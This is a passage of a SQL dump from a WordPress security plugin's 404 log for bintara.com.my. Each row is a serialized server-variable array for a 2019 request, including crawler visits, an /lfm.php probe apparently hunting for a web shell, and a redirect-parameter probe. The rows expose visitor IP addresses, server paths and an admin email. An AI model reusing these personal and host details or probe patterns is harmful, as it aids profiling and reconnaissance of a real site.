ER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY8PxIdg5Jl1mQBWl8V9kQAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569656773.0715\";s:12:\"REQUEST_TIME\";s:10:\"1569656773\";}}','notice','2019-09-28 07:46:14','2019-09-28 07:46:13',35495328,37297176,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.97.139'),(27271,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"59973\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY8k34dg5Jl1mQBWl8WJ5QAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569662175.9277\";s:12:\"REQUEST_TIME\";s:10:\"1569662175\";}}','notice','2019-09-28 09:16:17','2019-09-28 09:16:16',35129824,36938696,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'136.243.199.108'),(27272,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/?p=167\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:5:\"p=167\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.141\";s:11:\"REMOTE_PORT\";s:4:\"9570\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY8ym5B8LtYU@MYZI4656wAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569665691.5653\";s:12:\"REQUEST_TIME\";s:10:\"1569665691\";}}','notice','2019-09-28 10:14:54','2019-09-28 10:14:51',35518304,37315888,'https://bintara.com.my/?p=167',1,0,'46.229.168.141'),(27273,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE/Nutch-1.13\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.17.148.251\";s:11:\"REMOTE_PORT\";s:5:\"17338\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY9DPnQrfbvYuOCKuiMRNgAAAMA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569669951.0655\";s:12:\"REQUEST_TIME\";s:10:\"1569669951\";}}','notice','2019-09-28 11:25:53','2019-09-28 11:25:51',35538024,37337288,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'185.17.148.251'),(27293,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/lfm.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/lfm.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/lfm.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZAJTP4iBtRFmmlvRDasEgAAAcM\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/lfm.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/lfm.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZAJTP4iBtRFmmlvRDasEgAAAcM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"67.231.28.145\";s:11:\"REMOTE_PORT\";s:5:\"48187\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/lfm.php\";s:10:\"SCRIPT_URL\";s:8:\"/lfm.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZAJTP4iBtRFmmlvRDasEgAAAcM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569720652.6866\";s:12:\"REQUEST_TIME\";s:10:\"1569720652\";}}','notice','2019-09-29 01:30:54','2019-09-29 01:30:53',35179808,36981448,'https://bintara.com.my/lfm.php',1,0,'67.231.28.145'),(27294,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"5.188.84.13\";s:11:\"REMOTE_PORT\";s:5:\"52065\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZAL@v4iBtRFmmlvRDau1wAAAdE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569721338.4922\";s:12:\"REQUEST_TIME\";s:10:\"1569721338\";}}','notice','2019-09-29 01:42:21','2019-09-29 01:42:18',35521736,37329384,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'5.188.84.13'),(27295,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/ads.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:29:\"http://bintara.com.my/ads.txt\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/ads.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZA2JlkF2ixSfzlznd0w7gAAAU8\";s:12:\"REDIRECT_URL\";s:8:\"/ads.txt\";s:11:\"REMOTE_ADDR\";s:11:\"134.209.2.7\";s:11:\"REMOTE_PORT\";s:5:\"53486\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:10:\"SCRIPT_URL\";s:8:\"/ads.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZA2JlkF2ixSfzlznd0w7gAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569732134.7955\";s:12:\"REQUEST_TIME\";s:10:\"1569732134\";}}','notice','2019-09-29 04:42:17','2019-09-29 04:42:15',35529680,37341352,'https://bintara.com.my/ads.txt',1,0,'134.209.2.7'),(27296,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A5C98E03-C0ED-48CB-ABAE-8D9295FDB1EF\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZBBYI@6RYMKETn@EuqUrQAAAZg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.84.101\";s:11:\"REMOTE_PORT\";s:5:\"58349\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZBBYI@6RYMKETn@EuqUrQAAAZg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569735008.6044\";s:12:\"REQUEST_TIME\";s:10:\"1569735008\";}}','notice','2019-09-29 05:30:12','2019-09-29 05:30:09',35890688,37688448,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.84.101'),(27297,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/blog/tag/video-conferencing/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZBUtVkF2ixSfzlznd1CwAAAAUM\";s:12:\"REDIRECT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.189.12\";s:11:\"REMOTE_PORT\";s:5:\"35512\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:10:\"SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZBUtVkF2ixSfzlznd1CwAAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569739957.3573\";s:12:\"REQUEST_TIME\";s:10:\"1569739957\";}}','notice','2019-09-29 06:52:39','2019-09-29 06:52:37',34060496,35869072,'https://bintara.com.my/blog/tag/video-conferencing/',1,0,'141.8.189.12'),(27298,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/ads.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:10:\"text/plain\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:43:\"Jersey/2.25.1 (HttpUrlConnection 1.8.0_141)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/ads.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZBo9Ke6fKO2vmuLqIBWiAAAAIQ\";s:12:\"REDIRECT_URL\";s:8:\"/ads.txt\";s:11:\"REMOTE_ADDR\";s:11:\"54.235.41.4\";s:11:\"REMOTE_PORT\";s:5:\"42210\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:10:\"SCRIP